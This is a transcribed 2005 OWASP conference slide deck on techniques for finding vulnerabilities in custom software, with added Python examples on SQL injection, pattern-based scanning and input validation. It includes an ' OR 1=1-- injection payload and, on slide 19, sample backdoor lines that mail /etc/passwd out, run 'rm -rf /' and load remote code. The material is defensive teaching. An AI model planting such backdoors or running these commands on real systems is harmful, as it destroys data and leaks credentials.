Posted: 14-May-2015
Copyright © 2004 - The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.
The OWASP Foundation
4th Annual NTC ISSA InfoSec Nashville Conference, August 24, 2005
http://www.owasp.org

The Art of Finding Flaws: Techniques for Finding Vulnerabilities in Custom Software
Jeff Williams, CEO, Aspect Security; Chair, OWASP; [email protected]
Slide 2 (OWASP): The Future

A "Software Facts" label, laid out like a nutrition label:
Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1
Modules 155    Modules from Libraries 120
Expected Number of Users 15    Typical Roles per Instance 4
% Vulnerability*
    Cross Site Scripting 22    65%
        Reflected 12
        Stored 10
    SQL Injection 2
    Buffer Overflow 5
    Total Security Mechanisms 3
    Encryption 3
    Authentication 15
    95%
    Modularity .035
    Cyclomatic Complexity 323
    Access Control 3
    Input Validation 233
    Logging 33
* % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:

Usage                   Intranet        Internet
Cross Site Scripting    Less Than 10    5
    Reflected           Less Than 10    5
    Stored              Less Than 10    5
SQL Injection           Less Than 20    2
Buffer Overflow         Less Than 20    2
Security Mechanisms     10              14
Encryption              3               15
Slide 3: Today
- Code is code: all sectors, all languages, all platforms, all computing models, all sizes, intra/extra/inter-net
- New types of vulnerabilities are rare
- The market doesn't value secure code
- We trust code we shouldn't
- Cheaper, faster only
- We don't have any idea whether our code is trustworthy or not
Slide 4: Why Find Vulnerabilities?
- Nobody believes their software is vulnerable: "If the software works, then it must be secure"
- Finding flaws starts you on the path
- The cycle: Find Flaws -> Fix -> Find Flaws -> Improve -> Find Flaws -> Improve
- If you're not finding them, you're allowing them
Slide 5: Software Is A Black Box
- Complex: millions of lines of code, layers of leaky abstractions, massively interconnected
- Compiled: difficult to reverse engineer, different on every platform
- Legal protections: no peeking, we're not liable
Slide 6: Key Vulnerabilities
A few serious common vulnerabilities:
- Broken Access Control
- Weak Authentication and Session Management
- SQL Injection
- Cross Site Scripting
For more information see:
- The Top Ten Most Critical Web Application Vulnerabilities (www.owasp.org/documentation/topten.html)
- A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)
Slide 7: SQL Injection Illustrated
[Diagram, labelled APPLICATION ATTACK: an HTTP request travels through Firewall, Hardened OS, Web Server, App Server and a second Firewall into the application's Custom Code (Network Layer / Application Layer). The Custom Code issues a SQL query to a DB Table and returns an HTTP response. Back-end systems shown: Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing. Business functions shown: Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions.]
Query sent to the database:
"SELECT * FROM users WHERE user='' OR 1=1--' AND pass='password'"

1. Application presents a login form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends results to application
5. Application thinks login worked and sends welcome page
Result: Successful Login, "Welcome, Alice"
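The five steps above, as an added example that is not part of the original deck: a tiny login routine against an in-memory SQLite table (constructed sample data, one account named Alice) that builds the query by string concatenation exactly as the slide's query shows, beside the parameterized version of the same lookup. The deck's own examples are Java/Struts; the Python below is an illustration, and the table layout and the `' OR 1=1--` value are assumptions chosen to reproduce the slide's query text.

```python
import sqlite3


def make_db():
    # Constructed sample data: one account, matching the "Welcome, Alice" slide.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT, display TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret', 'Alice')")
    conn.commit()
    return conn


def build_query_vulnerable(user, password):
    # The slide's pattern: form fields are pasted straight into the SQL text,
    # so a quote in the field ends the string and "--" comments out the rest.
    return ("SELECT display FROM users WHERE user='" + user +
            "' AND pass='" + password + "'")


def login_vulnerable(conn, user, password):
    # Step 3: forward the attacker's form data to the database as SQL.
    row = conn.execute(build_query_vulnerable(user, password)).fetchone()
    # Step 5: any row at all is taken as a successful login.
    return row[0] if row else None


def login_safe(conn, user, password):
    # Parameterized query: the values travel separately from the SQL text, so
    # the quote and the "OR 1=1--" fragment are compared as data, never parsed.
    row = conn.execute(
        "SELECT display FROM users WHERE user=? AND pass=?", (user, password)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"          # the attacker's "username" from step 2
    print(build_query_vulnerable(payload, "password"))
    print("vulnerable:", login_vulnerable(db, payload, "password"))   # Alice
    print("parameterized:", login_safe(db, payload, "password"))      # None
```

The vulnerable function logs in as Alice because the WHERE clause collapses to `user='' OR 1=1`, which is true for every row; the parameterized function returns nothing because no account has the literal name `' OR 1=1--`.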
Slide 8: Scanning for SQL Injection
Method
- Use "signatures" to send malformed SQL commands
- Analyze responses to see if it "worked"
- Nessus, nikto, absinthe
Pros
- Requires only network access to application
- Fast and easy to run
Cons
- May only exercise part of an application
- Prone to false alarms and missed positives
- Results indicate URL but not line of code
- Can be problems with credentials, roles, and SSL
Slide 9: Static Analysis for SQL Injection
Method
- Automatically analyze source code for patterns
- Tools load source code, compile, and analyze
Pros
- Requires only the software baseline
- Fast and easy to run
Cons
- Can't factor in the runtime environment
- Prone to false alarms and missed positives
- Results indicate line of code but not URL
- Doesn't find design problems
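To make the "patterns" method and its false alarms and missed positives concrete, here is an added example (not a tool from the deck, and not how any real static analyzer is built): a one-rule scanner that flags a JDBC execute call whose argument is a string literal concatenated with something else. The Java lines it scans are constructed for the example, and the variable and constant names in them are assumptions.

```python
import re

# Constructed Java source, in the style of the deck's Struts examples.
SAMPLE_JAVA = """\
String name = request.getParameter("name");
ResultSet rs = stmt.executeQuery("SELECT * FROM users WHERE user='" + name + "'");
String q = "SELECT * FROM users WHERE user='" + name + "'";
ResultSet rs2 = stmt.executeQuery(q);
ResultSet rs3 = stmt.executeQuery("SELECT * FROM config WHERE id=" + MAX_ID);
PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE user=?");
"""

# One pattern: an execute call opened with a string literal followed by "+".
CONCAT_IN_EXECUTE = re.compile(
    r'\b(executeQuery|executeUpdate|execute)\s*\(\s*"[^"]*"\s*\+'
)


def scan_java(source):
    """Return (line_number, stripped_line) for every line matching the pattern.

    Line numbers are what a source-level tool reports (the deck's "line of
    code but not URL"); it has no idea which page reaches this code.
    """
    hits = []
    for n, line in enumerate(source.splitlines(), start=1):
        if CONCAT_IN_EXECUTE.search(line):
            hits.append((n, line.strip()))
    return hits


def hit_lines(source):
    return [n for n, _ in scan_java(source)]


if __name__ == "__main__":
    for n, line in scan_java(SAMPLE_JAVA):
        print(f"line {n}: {line}")
```

Run on the sample, the rule reports lines 2 and 5. Line 2 is a real finding. Line 5 is a false alarm: the concatenated value is a constant, not user input. Line 4 is a missed positive: the same tainted query is built one line earlier and passed through a variable, which a single-line pattern cannot follow; that is exactly why production tools track data flow from `getParameter` to the execute call rather than matching text.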
Slide 10: Penetration Testing for SQL Injection
Method
- Custom attacks by an expert security tester
- Use OWASP WebScarab to craft custom attacks
- Expert analyzes responses to see if attack worked
Pros
- Open source tools available
- Recommend an internal team
Cons
- Requires expertise in security, software, and SQL
- Difficult to exercise the entire application
- Tester may not be able to determine success
Slide 11: Code Review for SQL Injection
Method
- Reviewer analyzes code for patterns
- Use tools to view baseline in different ways
- Examine mechanisms, common vulnerability areas
Pros
- Cost-effective
- Can examine the entire baseline
Cons
- Can't factor in the runtime environment
- Requires skills in software and security
Slide 12: Security Analysis Techniques

                 Find Vulnerabilities Using        Find Vulnerabilities Using
                 the Running Application           the Source Code
Automated        Vulnerability Scanning            Static Code Analysis
Manual           Penetration Testing               Code Review

Combining All Four Techniques is Most Effective
Slide 13: Vulnerability Patterns

    public class DamagedStrutsForm extends ActionForm {

        // Failure to Validate: "name" and "color" go straight from the
        // request into the bean without being checked.
        public void doForm( HttpServletRequest request ) {
            UserBean u = session.getUserBean();
            u.setName( request.getParameter("name") );
            u.setFavoriteColor( request.getParameter("color") );
        }

        // Blacklist Validation: only the one string "<scri" is rejected.
        // Time of Check, Time of Use: this checks "Name", but doForm uses "name".
        // Fail Open: any exception (e.g. a missing parameter) returns true.
        public boolean validate( HttpServletRequest request ) {
            try {
                if ( request.getParameter("Name").indexOf("<scri") != -1 ) {
                    logger.log( "Script detected" );
                    return false;
                }
            } catch( Exception e ) {}
            return true;
        }
    }

Patterns called out on the slide:
- Failure to Validate
- Blacklist Validation
- Fail Open
- Failure to Validate
- Time of Check, Time of Use
- Failure to Validate
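The opposite of each pattern above, as an added example that is not from the deck: an allowlist check for the two form fields, a validator that fails closed on any error, and an apply step that stores only the values the validator returned, so the value checked is the value used. The slide's blacklist check is reproduced beside it to show what it misses. The code is Python rather than the deck's Java, and the field names, allowlist patterns and colour list are assumptions.

```python
import re

# Allowlists for the slide's two fields (assumed rules for the example).
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]{0,49}$")
COLOR_RE = re.compile(r"^(red|green|blue|yellow|black|white)$")


class ValidationError(ValueError):
    pass


def validate_form(params):
    """Return only the checked values; raise on anything unexpected.

    Fails closed: a missing field or a non-matching value is an error, never
    a silent True.
    """
    try:
        name = params["name"]
        color = params["color"]
    except KeyError as missing:
        raise ValidationError(f"missing field {missing}") from None
    if not NAME_RE.fullmatch(name):
        raise ValidationError("name rejected")
    if not COLOR_RE.fullmatch(color):
        raise ValidationError("color rejected")
    return {"name": name, "color": color}


def is_valid(params):
    try:
        validate_form(params)
        return True
    except ValidationError:
        return False


def apply_form(user, params):
    # Check and use the same values: the dict validate_form returned is what
    # gets stored, so no other parameter (or spelling of it) can slip through.
    clean = validate_form(params)
    user["name"] = clean["name"]
    user["favorite_color"] = clean["color"]
    return user


def blacklist_validate(params):
    """The slide's check, reproduced to show its gaps: only "<scri" is
    blocked, it looks at "Name" rather than "name", and any exception
    (here a missing key) ends in True."""
    try:
        return "<scri" not in params["Name"]
    except Exception:
        return True


if __name__ == "__main__":
    print(apply_form({}, {"name": "Alice", "color": "blue"}))
    print(is_valid({"name": "<SCRIPT>", "color": "blue"}))   # False
    print(blacklist_validate({"Name": "<SCRIPT>"}))          # True: case bypass
    print(blacklist_validate({"name": "<script>"}))          # True: fail open
```

Two things to notice when running it: the blacklist passes `<SCRIPT>` because its one signature is case-sensitive, and it passes a request that has `name` but no `Name` because the lookup throws and the handler swallows it. The allowlist version rejects both, and `apply_form` cannot store a field the validator did not return.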
Slide 14: A Change In Perspective
- Think like an attacker!
- Understand how the application works, especially the security mechanisms: how does the application make security decisions?
- The easy part? Test and analyze for a single vulnerability
- The hard part? Do an entire application for all types of vulnerabilities
Slide 15: Getting Started
- Adopt the OWASP Top Ten: set the bar
- Spot check a few applications
    - Are your security mechanisms easy to understand?
    - Are you doing validation, error handling, logging, etc.?
- Get security out in the open!
- Come to my talk later to find out more!!!
Slide 16: OWASP Can Help
- Open Web Application Security Project
- Nonprofit Foundation
- All materials available under approved open source licenses
- Dozens of projects, over 50 chapters worldwide, thousands of participants, and millions of hits a month
- OWASP is dedicated to finding and fighting the causes of insecure software
Slide 17: OWASP Supports Vulnerability Analysis
- OWASP Top Ten: set priorities, get management buy-in
- OWASP Guide: 300 page book for application security
- OWASP Testing Guide: test/analysis methods for application security
- OWASP WebScarab: web application & web service penetration tool
Slide 18: Some of What You'll Find at OWASP
- Community: Local Chapters, Translations, Conferences, Mailing Lists, Papers and more...
- Documentation: Guide, Top Ten, Testing, Legal, AppSec FAQ and more...
- Tools: WebGoat, WebScarab, Stinger, DotNet and more...
- All free and open source. We encourage your company to support us by becoming a member.
Slide 19: What Could a Malicious Developer Do?

Trojan Horse runs for admin:
    if ( System.getCurrentUser().getName().equals( "admin" ) )
        Runtime.exec( "sendmail [email protected] < /etc/passwd" );

Secret trigger removes all files on root partition:
    if ( req.getParameter( "codeword" ).equals( "eagle" ) )
        Runtime.exec( "rm -rf /" );

Randomly corrupt data one time in 100:
    if ( Math.random() < .01 )
        bean.setValue( "corrupt" );

Load and execute code from remote server:
    ((A)(ClassLoader.getSystemClassLoader().defineClass( null, readBytesFromNetwork(), 0, 422 ).newInstance())).attack();

Make backdoor look like inadvertent mistake:
    if ( input < 0 )
        throw new RuntimeException( "Input error" );

- Impossible to tell malicious from mistake
- Who wrote the libraries your application uses?
Slide 20: Questions & Answers